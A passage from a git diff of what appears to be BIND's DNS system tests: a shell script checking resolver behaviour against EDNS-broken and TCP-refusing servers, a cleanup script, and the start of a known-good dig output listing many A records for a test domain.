$1 can be resolved by +# ns1. Return 0 if resolution fails as expected; return 1 otherwise. Note that +# both a SERVFAIL response and timing out mean resolution failed, so the exit +# code of dig does not influence the result (the exit code for a SERVFAIL +# response is 0 while the exit code for not getting a response at all is not 0). +resolution_fails() { + _servfail=0 + _timeout=0 + $DIG $DIGOPTS +tcp +time=5 @10.53.0.1 ${1} SOA > dig.out.test$n + grep "status: SERVFAIL" dig.out.test$n > /dev/null && _servfail=1 + grep "connection timed out" dig.out.test$n > /dev/null && _timeout=1 + if [ $_servfail -eq 1 ] || [ $_timeout -eq 1 ]; then + return 0 + else + return 1 + fi +} + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "checking formerr edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.8 ednsformerr soa > dig.out.1.test$n || ret=1 +grep "status: FORMERR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns @10.53.0.8 ednsformerr soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to formerr edns server succeeds ($n)" +ret=0 +resolution_succeeds ednsformerr. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking notimp edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.9 ednsnotimp soa > dig.out.1.test$n || ret=1 +grep "status: NOTIMP" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns @10.53.0.9 ednsnotimp soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to notimp edns server fails ($n)" +ret=0 +resolution_fails ednsnotimp. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking refused edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.10 ednsrefused soa > dig.out.1.test$n || ret=1 +grep "status: REFUSED" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns @10.53.0.10 ednsrefused soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to refused edns server fails ($n)" +ret=0 +resolution_fails ednsrefused. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking drop edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.2 dropedns soa > dig.out.1.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noedns @10.53.0.2 dropedns soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns +tcp @10.53.0.2 dropedns soa > dig.out.3.test$n || ret=1 +grep "status: NOERROR" dig.out.3.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.3.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.2 dropedns soa > dig.out.4.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to drop edns server fails ($n)" +ret=0 +resolution_fails dropedns. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking drop edns + no tcp server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.3 dropedns-notcp soa > dig.out.1.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noedns +tcp @10.53.0.3 dropedns-notcp soa > dig.out.2.test$n && ret=1 +grep "connection refused" dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noedns @10.53.0.3 dropedns-notcp soa > dig.out.3.test$n || ret=1 +grep "status: NOERROR" dig.out.3.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to drop edns + no tcp server fails ($n)" +ret=0 +resolution_fails dropedns-notcp. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking plain dns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.4 plain soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.4 plain soa > dig.out.2.test$n +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to plain dns server succeeds ($n)" +ret=0 +resolution_succeeds plain. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking plain dns + no tcp server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.5 plain-notcp soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.5 plain-notcp soa > dig.out.2.test$n +grep "connection refused" dig.out.2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to plain dns + no tcp server succeeds ($n)" +ret=0 +resolution_succeeds plain-notcp. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking edns 512 server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.6 edns512 soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.6 edns512 soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec @10.53.0.6 edns512 soa > dig.out.3.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.3.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec +bufsize=512 +ignore @10.53.0.6 edns512 soa > dig.out.4.test$n || ret=1 +grep "status: NOERROR" dig.out.4.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.4.test$n > /dev/null || ret=1 +grep "flags:.* tc[ ;]" dig.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 server succeeds ($n)" +ret=0 +resolution_succeeds edns512. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking edns 512 + no tcp server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.7 edns512-notcp soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.7 edns512-notcp soa > dig.out.2.test$n && ret=1 +grep "connection refused" dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec @10.53.0.7 edns512-notcp soa > dig.out.3.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.3.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec +bufsize=512 +ignore @10.53.0.7 edns512-notcp soa > dig.out.4.test$n || ret=1 +grep "status: NOERROR" dig.out.4.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.4.test$n > /dev/null || ret=1 +grep "flags:.* tc[ ;]" dig.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 + no tcp server fails ($n)" +ret=0 +resolution_fails edns512-notcp. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 + no tcp server does not cause query loops ($n)" +ret=0 +sent=`grep -c -F "sending packet to 10.53.0.7" ns1/named.run` +if [ $sent -ge 10 ]; then + echo_i "ns1 sent $sent queries to ns7, expected less than 10" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that TCP failures do not influence EDNS statistics in the ADB ($n)" +ret=0 +rndc_dumpdb ns1 -adb || ret=1 +timeouts512=`sed -n "s|.*10\.53\.0\.7.*\[edns \([0-9/][0-9/]*\).*|\1|p" ns1/named_dump.db.test$n | awk -F/ '{print $NF}'` +if [ $timeouts512 -ne 0 ]; then + echo_i "512-byte EDNS timeouts according to ADB: $timeouts512, expected: 0" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +stop_server --use-rndc --port ${CONTROLPORT} ns1 +copy_setports ns1/named2.conf.in ns1/named.conf +start_server --noclean --restart --port ${PORT} ns1 + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 + no tcp + trust anchor fails ($n)" +# retry loop in case the server restart above causes transient failure +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + resolution_fails edns512-notcp. || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/limits/clean.sh b/bin/tests/system/limits/clean.sh new file mode 100644 index 0000000..b69c695 --- /dev/null +++ b/bin/tests/system/limits/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after limits tests. +# +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/limits/knowngood.dig.out.1000 b/bin/tests/system/limits/knowngood.dig.out.1000 new file mode 100644 index 0000000..3b7e01a --- /dev/null +++ b/bin/tests/system/limits/knowngood.dig.out.1000 @@ -0,0 +1,1023 @@ + +; <<>> DiG 8.2 <<>> 1000.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 1000, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; 1000.example, type = A, class = IN + +;; ANSWER SECTION: +1000.example. 5M IN A 10.0.0.0 +1000.example. 5M IN A 10.0.0.1 +1000.example. 5M IN A 10.0.0.2 +1000.example. 5M IN A 10.0.0.3 +1000.example. 5M IN A 10.0.0.4 +1000.example. 5M IN A 10.0.0.5 +1000.example. 5M IN A 10.0.0.6 +1000.example. 5M IN A 10.0.0.7 +1000.example. 5M IN A 10.0.0.8 +1000.example. 5M IN A 10.0.0.9 +1000.example. 5M IN A 10.0.0.10 +1000.example. 5M IN A 10.0.0.11 +1000.example. 5M IN A 10.0.0.12 +1000.example. 5M IN A 10.0.0.13 +1000.example. 5M IN A 10.0.0.14 +1000.example. 5M IN A 10.0.0.15 +1000.example. 5M IN A 10.0.0.16 +1000.example. 5M IN A 10.0.0.17 +1000.example. 5M IN A 10.0.0.18 +1000.example. 5M IN A 10.0.0.19 +1000.example. 5M IN A 10.0.0.20 +1000.example. 5M IN A 10.0.0.21 +1000.example. 5M IN A 10.0.0.22 +1000.example. 5M IN A 10.0.0.23 +1000.example. 5M IN A 10.0.0.24 +1000.example. 5M IN A 10.0.0.25 +1000.example. 5M IN A 10.0.0.26 +1000.example. 5M IN A 10.0.0.27 +1000.example. 5M IN A 10.0.0.28 +1000.example. 5M IN A 10.0.0.29 +1000.example. 5M IN A 10.0.0.30 +1000.example. 5M IN A 10.0.0.31 +1000.example. 5M IN A 10.0.0.32 +1000.example. 5M IN A 10.0.0.33 +1000.example. 5M IN A 10.0.0.34 +1000.example. 5M IN A 10.0.0.35 +1000.example. 5M IN A 10.0.0.36 +1000.example. 5M IN A 10.0.0.37 +1000.example. 5M IN A 10.0.0.38 +1000.example. 5M IN A 10.0.0.39 +1000.example. 5M IN A 10.0.0.40 +1000.example. 5M IN A 10.0.0.41 +1000.example. 5M IN A 10.0.0.42 +1000.example. 5M IN A 10.0.0.43 +1000.example. 5M IN A 10.0.0.44 +1000.example. 5M IN A 10.0.0.45 +1000.example. 5M IN A 10.0.0.46 +1000.example. 5M IN A 10.0.0.47 +1000.example. 5M IN A 10.0.0.48 +1000.example. 5M IN A 10.0.0.49 +1000.example. 5M IN A 10.0.0.50 +1000.example. 5M IN A 10.0.0.51 +1000.example. 5M IN A 10.0.0.52 +1000.example. 5M IN A 10.0.0.53 +1000.example. 5M IN A 10.0.0.54 +1000.example. 5M IN A 10.0.0.55 +1000.example. 5M IN A 10.0.0.56 +1000.example. 5M IN A 10.0.0.57 +1000.example. 5M IN A 10.0.0.58 +1000.example. 5M IN A 10.0.0.59 +1000.example. 5M IN A 10.0.0.60 +1000.example. 5M IN A 10.0.0.61 +1000.example. 5M IN A 10.0.0.62 +1000.example. 5M IN A 10.0.0.63 +1000.example. 5M IN A 10.0.0.64 +1000.example. 5M IN A 10.0.0.65 +1000.example. 5M IN A 10.0.0.66 +1000.example. 5M IN A 10.0.0.67 +1000.example. 5M IN A 10.0.0.68 +1000.example. 5M IN A 10.0.0.69 +1000.example. 5M IN A 10.0.0.70 +1000.example. 5M IN A 10.0.0.71 +1000.example. 5M IN A 10.0.0.72 +1000.example. 5M IN A 10.0.0.73 +1000.example. 5M IN A 10.0.0.74 +1000.example. 5M IN A 10.0.0.75 +1000.example. 5M IN A 10.0.0.76 +1000.example. 5M IN A 10.0.0.77 +1000.example. 5M IN A 10.0.0.78 +1000.example. 5M IN A 10.0.0.79 +1000.example. 5M IN A 10.0.0.80 +1000.example. 5M IN A 10.0.0.81 +1000.example. 5M IN A 10.0.0.82 +1000.example. 5M IN A 10.0.0.83 +1000.example. 5M IN A 10.0.0.84 +1000.example. 5M IN A 10.0.0.85 +1000.example. 5M IN A 10.0.0.86 +1000.example. 5M IN A 10.0.0.87 +1000.example. 5M IN A 10.0.0.88 +1000.example. 5M IN A 10.0.0.89 +1000.example. 5M IN A 10.0.0.90 +1000.example. 5M IN A 10.0.0.91 +1000.example. 5M IN A 10.0.0.92 +1000.example. 5M IN A 10.0.0.93 +1000.example. 5M IN A 10.0.0.94 +1000.example. 5M IN A 10.0.0.95 +1000.example. 5M IN A 10.0.0.96 +1000.example. 5M IN A 10.0.0.97 +1000.example. 5M IN A 10.0.0.98 +1000.example. 5M IN A 10.0.0.99 +1000.example. 5M IN A 10.0.0.100 +1000.example. 5M IN A 10.0.0.101 +1000.example. 5M IN A 10.0.0.102 +1000.example. 5M IN A 10.0.0.103 +1000.example. 5M IN A 10.0.0.104 +1000.example. 5M IN A 10.0.0.105 +1000.example. 5M IN A 10.0.0.106 +1000.example. 5M IN A 10.0.0.107 +1000.example. 5M IN A 10.0.0.108 +1000.example. 5M IN A 10.0.0.109 +1000.example. 5M IN A 10.0.0.110 +1000.example. 5M IN A 10.0.0.111 +1000.example. 5M IN A 10.0.0.112 +1000.example. 5M IN A 10.0.0.113 +1000.example. 5M IN A 10.0.0.114 +1000.example. 5M IN A 10.0.0.115 +1000.example. 5M IN A 10.0.0.116 +1000.example. 5M IN A 10.0.0.117 +1000.example. 5M IN A 10.0.0.118 +1000.example. 5M IN A 10.0.0.119 +1000.example. 5M IN A 10.0.0.120 +1000.example. 5M IN A 10.0.0.121 +1000.example. 5M IN A 10.0.0.122 +1000.example. 5M IN A 10.0.0.123 +1000.example. 5M IN A 10.0.0.124 +1000.example. 5M IN A 10.0.0.125 +1000.example. 5M IN A 10.0.0.126 +1000.example. 5M IN A 10.0.0.127 +1000.example. 5M IN A 10.0.0.128 +1000.example. 5M IN A 10.0.0.129 +1000.example. 5M IN A 10.0.0.130 +1000.example. 5M IN A 10.0.0.131 +1000.example. 5M IN A 10.0.0.132 +1000.example. 5M IN A 10.0.0.133 +1000.example. 5M IN A 10.0.0.134 +1000.example. 5M IN A 10.0.0.135 +1000.example. 5M IN A 10.0.0.136 +1000.example. 5M IN A 10.0.0.137 +1000.example. 5M IN A 10.0.0.138 +1000.example. 5M IN A 10.0.0.139 +1000.example. 5M IN A 10.0.0.140 +1000.example. 5M IN A 10.0.0.141 +1000.example. 5M IN A 10.0.0.142 +1000.example. 5M IN A 10.0.0.143 +1000.example. 5M IN A 10.0.0.144 +1000.example. 5M IN A 10.0.0.145 +1000.example. 5M IN A 10.0.0.146 +1000.example. 5M IN A 10.0.0.147 +1000.example. 5M IN A 10.0.0.148 +1000.example. 5M IN A 10.0.0.149 +1000.example. 5M IN A 10.0.0.150 +1000.example. 5M IN A 10.0.0.151 +1000.example. 5M IN A 10.0.0.152 +1000.example. 5M IN A 10.0.0.153 +1000.example. 5M IN A 10.0.0.154 +1000.example. 5M IN A 10.0.0.155 +1000.example. 5M IN A 10.0.0.156 +1000.example. 5M IN A 10.0.0.157 +1000.example. 5M IN A 10.0.0.158 +1000.example. 5M IN A 10.0.0.159 +1000.example. 5M IN A 10.0.0.160 +1000.example. 5M IN A 10.0.0.161 +1000.example. 5M IN A 10.0.0.162 +1000.example. 5M IN A 10.0.0.163 +1000.example. 5M IN A 10.0.0.164 +1000.example. 5M IN A 10.0.0.165 +1000.example. 5M IN A 10.0.0.166 +1000.example. 5M IN A 10.0.0.167 +1000.example. 5M IN A 10.0.0.168 +1000.example. 5M IN A 10.0.0.169 +1000.example. 5M IN A 10.0.0.170 +1000.example. 5M IN A 10.0.0.171 +1000.example. 5M IN A 10.0.0.172 +1000.example. 5M IN A 10.0.0.173 +1000.example. 5M IN A 10.0.0.174 +1000.example. 5M IN A 10.0.0.175 +1000.example. 5M IN A 10.0.0.176 +1000.example. 5M IN A 10.0.0.177 +1000.example. 5M IN A 10.0.0.178 +1000.example. 5M IN A 10.0.0.179 +1000.example. 5M IN A 10.0.0.180 +1000.example. 5M IN A 10.0.0.181 +1000.example. 5M IN A 10.0.0.182 +1000.example. 5M IN A 10.0.0.183 +1000.example. 5M IN A 10.0.0.184 +1000.example. 5M IN A 10.0.0.185 +1000.example. 5M IN A 10.0.0.186 +1000.example. 5M IN A 10.0.0.187 +1000.example. 5M IN A 10.0.0.188 +1000.example. 5M IN A 10.0.0.189 +1000.example. 5M IN A 10.0.0.190 +1000.example. 5M IN A 10.0.0.191 +1000.example. 5M IN A 10.0.0.192 +1000.example. 5M IN A 10.0.0.193 +1000.example. 5M IN A 10.0.0.194 +1000.example. 5M IN A 10.0.0.195 +1000.example. 5M IN A 10.0.0.196 +1000.example. 5M IN A 10.0.0.197 +1000.example. 5M IN A 10.0.0.198 +1000.example. 5M IN A 10.0.0.199 +1000.example. 5M IN A 10.0.0.200 +1000.example. 5M IN A 10.0.0.201 +1000.example. 5M IN A 10.0.0.202 +1000.example. 5M IN A 10.0.0.203 +1000.example. 5M IN A 10.0.0.204 +1000.example. 5M IN A 10.0.0.205 +1000.example. 5M IN A 10.0.0.206 +1000.example. 5M IN A 10.0.0.207 +1000.example. 5M IN A 10.0.0.208 +1000.example. 5M IN A 10.0.0.209 +1000.example. 5M IN A 10.0.0.210 +1000.example. 5M IN A 10.0.0.211 +1000.example. 5M IN A 10.0.0.212 +1000.example. 5M IN A 10.0.0.213 +1000.example. 5M IN A 10.0.0.214 +1000.example. 5M IN A 10.0.0.215 +1000.example. 5M IN A 10.0.0.216 +1000.example. 5M IN A 10.0.0.217 +1000.example. 5M IN A 10.0.0.218 +1000.example. 5M IN A 10.0.0.219 +1000.example. 5M IN A 10.0.0.220 +1000.example. 5M IN A 10.0.0.221 +1000.example. 5M IN A 10.0.0.222 +1000.example. 5M IN A 10.0.0.223 +1000.example. 5M IN A 10.0.0.224 +1000.example. 5M IN A 10.0.0.225 +1000.example. 5M IN A 10.0.0.226 +1000.example. 5M IN A 10.0.0.227 +1000.example. 5M IN A 10.0.0.228 +1000.example. 5M IN A 10.0.0.229 +1000.example. 5M IN A 10.0.0.230 +1000.example. 5M IN A 10.0.0.231 +1000.example. 5M IN A 10.0.0.232 +1000.example. 5M IN A 10.0.0.233 +1000.example. 5M IN A 10.0.0.234 +1000.example. 5M IN A 10.0.0.235 +1000.example. 5M IN A 10.0.0.236 +1000.example. 5M IN A 10.0.0.237 +1000.example. 5M IN A 10.0.0.238 +1000.example. 5M IN A 10.0.0.239 +1000.example. 5M IN A 10.0.0.240 +1000.example. 5M IN A 10.0.0.241 +1000.example. 5M IN A 10.0.0.242 +1000.example. 5M IN A 10.0.0.243 +1000.example. 5M IN A 10.0.0.244 +1000.example. 5M IN A 10.0.0.245 +1000.example. 5M IN A 10.0.0.246 +1000.example. 5M IN A 10.0.0.247 +1000.example. 5M IN A 10.0.0.248 +1000.example. 5M IN A 10.0.0.249 +1000.example. 5M IN A 10.0.0.250 +1000.example. 5M IN A 10.0.0.251 +1000.example. 5M IN A 10.0.0.252 +1000.example. 5M IN A 10.0.0.253 +1000.example. 5M IN A 10.0.0.254 +1000.example. 5M IN A 10.0.0.255 +1000.example. 5M IN A 10.0.1.0 +1000.example. 5M IN A 10.0.1.1 +1000.example. 5M IN A 10.0.1.2 +1000.example. 5M IN A 10.0.1.3 +1000.example. 5M IN A 10.0.1.4 +1000.example. 5M IN A 10.0.1.5 +1000.example. 5M IN A 10.0.1.6 +1000.example. 5M IN A 10.0.1.7 +1000.example. 5M IN A 10.0.1.8 +1000.example. 5M IN A 10.0.1.9 +1000.example. 5M IN A 10.0.1.10 +1000.example. 5M IN A 10.0.1.11 +1000.example. 5M IN A 10.0.1.12 +1000.example. 5M IN A 10.0.1.13 +1000.example. 5M IN A 10.0.1.14 +1000.example. 5M IN A 10.0.1.15 +1000.example. 5M IN A 10.0.1.16 +1000.example. 5M IN A 10.0.1.17 +1000.example. 5M IN A 10.0.1.18 +1000.example. 5M IN A 10.0.1.19 +1000.example. 5M IN A 10.0.1.20 +1000.example. 5M IN A 10.0.1.21 +1000.example. 5M IN A 10.0.1.22 +1000.example. 5M IN A 10.0.1.23 +1000.example. 5M IN A 10.0.1.24 +1000.example. 5M IN A 10.0.1.25 +1000.example. 5M IN A 10.0.1.26 +1000.example. 5M IN A 10.0.1.27 +1000.example. 5M IN A 10.0.1.28 +1000.example. 5M IN A 10.0.1.29 +1000.example. 5M IN A 10.0.1.30 +1000.example. 5M IN A 10.0.1.31 +1000.example. 5M IN A 10.0.1.32 +1000.example. 5M IN A 10.0.1.33 +1000.example. 5M IN A 10.0.1.34 +1000.example. 5M IN A 10.0.1.35 +1000.example. 5M IN A 10.0.1.36 +1000.example. 5M IN A 10.0.1.37 +1000.example. 5M IN A 10.0.1.38 +1000.example. 5M IN A 10.0.1.39 +1000.example. 5M IN A 10.0.1.40 +1000.example. 5M IN A 10.0.1.41 +1000.example. 5M IN A 10.0.1.42 +1000.example. 5M IN A 10.0.1.43 +1000.example. 5M IN A 10.0.1.44 +1000.example. 5M IN A 10.0.1.45 +1000.example. 5M IN A 10.0.1.46 +1000.example. 5M IN A 10.0.1.47 +1000.example. 5M IN A 10.0.1.48 +1000.example. 5M IN A 10.0.1.49 +1000.example. 5M IN A 10.0.1.50 +1000.example. 5M IN A 10.0.1.51 +1000.example. 5M IN A 10.0.1.52 +1000.example. 5M IN A 10.0.1.53 +1000.example. 5M IN A 10.0.1.54 +1000.example. 5M IN A 10.0.1.55 +1000.example. 5M IN A 10.0.1.56 +1000.example. 5M IN A 10.0.1.57 +1000.example. 5M IN A 10.0.1.58 +1000.example. 5M IN A 10.0.1.59 +1000.example. 5M IN A 10.0.1.60 +1000.example. 5M IN A 10.0.1.61 +1000.example. 5M IN A 10.0.1.62 +1000.example. 5M IN A 10.0.1.63 +1000.example. 5M IN A 10.0.1.64 +1000.example. 5M IN A 10.0.1.65 +1000.example. 5M IN A 10.0.1.66 +1000.example. 5M IN A 10.0.1.67 +1000.example. 5M IN A 10.0.1.68 +1000.example. 5M IN A 10.0.1.69 +1000.example. 5M IN A 10.0.1.70 +1000.example. 5M IN A 10.0.1.71 +1000.example. 5M IN A 10.0.1.72 +1000.example. 5M IN A 10.0.1.73 +1000.example. 5M IN A 10.0.1.74 +1000.example. 5M IN A 10.0.1.75 +1000.example. 5M IN A 10.0.1.76 +1000.example. 5M IN A 10.0.1.77 +1000.example. 5M IN A 10.0.1.78 +1000.example. 5M IN A 10.0.1.79 +1000.example. 5M IN A 10.0.1.80 +1000.example. 5M IN A 10.0.1.81 +1000.example. 5M IN A 10.0.1.82 +1000.example. 5M IN A 10.0.1.83 +1000.example. 5M IN A 10.0.1.84 +1000.example. 5M IN A 10.0.1.85 +1000.example. 5M IN A 10.0.1.86 +1000.example. 5M IN A 10.0.1.87 +1000.example. 5M IN A 10.0.1.88 +1000.example. 5M IN A 10.0.1.89 +1000.example. 5M IN A 10.0.1.90 +1000.example. 5M IN A 10.0.1.91 +1000.example. 5M IN A 10.0.1.92 +1000.example. 5M IN A 10.0.1.93 +1000.example. 5M IN A 10.0.1.94 +1000.example. 5M IN A 10.0.1.95 +1000.example. 5M IN A 10.0.1.96 +1000.example. 5M IN A 10.0.1.97 +1000.example. 5M IN A 10.0.1.98 +1000.example. 5M IN A 10.0.1.99 +1000.example. 5M IN A 10.0.1.100 +1000.example. 5M IN A 10.0.1.101 +1000.example. 5M IN A 10.0.1.102 +1000.example. 5M IN A 10.0.1.103 +1000.example. 5M IN A 10.0.1.104 +1000.example. 5M IN A 10.0.1.105 +1000.example. 5M IN A 10.0.1.106 +1000.example. 5M IN A 10.0.1.107 +1000.example. 5M IN A 10.0.1.108 +1000.example. 5M IN A 10.0.1.109 +1000.example. 5M IN A 10.0.1.110 +1000.example. 5M IN A 10.0.1.111 +1000.example. 5M IN A 10.0.1.112 +1000.example. 5M IN A 10.0.1.113 +1000.example. 5M IN A 10.0.1.114 +1000.example. 5M IN A 10.0.1.115 +1000.example. 5M IN A 10.0.1.116 +1000.example. 5M IN A 10.0.1.117 +1000.example. 5M IN A 10.0.1.118 +1000.example. 5M IN A 10.0.1.119 +1000.example. 5M IN A 10.0.1.120 +1000.example. 5M IN A 10.0.1.121 +1000.example. 5M IN A 10.0.1.122 +1000.example. 5M IN A 10.0.1.123 +1000.example. 5M IN A 10.0.1.124 +1000.example. 5M IN A 10.0.1.125 +1000.example. 5M IN A 10.0.1.126 +1000.example. 5M IN A 10.0.1.127 +1000.example. 5M IN A 10.0.1.128 +1000.example. 5M IN A 10.0.1.129 +1000.example. 5M IN A 10.0.1.130 +1000.example. 5M IN A 10.0.1.131 +1000.example. 5M IN A 10.0.1.132 +1000.example. 5M IN A 10.0.1.133 +1000.example. 5M IN A 10.0.1.134 +1000.example. 5M IN A 10.0.1.135 +1000.example. 5M IN A 10.0.1.136 +1000.example. 5M IN A 10.0.1.137 +1000.example. 5M IN A 10.0.1.138 +1000.example. 5M IN A 10.0.1.139 +1000.example. 5M IN A 10.0.1.140 +1000.example. 5M IN A 10.0.1.141 +1000.example. 5M IN A 10.0.1.142 +1000.example. 5M IN A 10.0.1.143 +1000.example. 5M IN A 10.0.1.144 +1000.example. 5M IN A 10.0.1.145 +1000.example. 5M IN A 10.0.1.146 +1000.example. 5M IN A 10.0.1.147 +1000.example. 5M IN A 10.0.1.148 +1000.example. 5M IN A 10.0.1.149 +1000.example. 5M IN A 10.0.1.150 +1000.example. 5M IN A 10.0.1.151 +1000.example. 5M IN A 10.0.1.152 +1000.example. 5M IN A 10.0.1.153 +1000.example. 5M IN A 10.0.1.154 +1000.example. 5M IN A 10.0.1.155 +1000.example. 5M IN A 10.0.1.156 +1000.example. 5M IN A 